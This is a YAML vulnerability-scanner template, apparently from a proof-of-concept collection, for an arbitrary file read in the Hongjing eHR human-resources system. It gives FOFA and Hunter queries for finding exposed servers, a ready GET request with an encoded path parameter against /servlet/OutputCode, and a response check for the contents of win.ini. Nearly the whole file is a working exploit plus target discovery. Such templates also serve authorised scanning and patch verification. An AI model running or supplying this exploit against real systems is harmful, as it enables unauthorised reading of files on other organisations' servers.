product: 宏景eHR人力资源信息管理系统
vName: 宏景eHR OutputCode任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 宏景eHR /servlet/OutputCode存在任意文件读取
version: ''
note: ''
search:
  FOFA: app="HJSOFT-HCM"
  Hunter: app.name="宏景 HCM"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/139083090
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwqF7eJiXGeHU4B
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: 'and'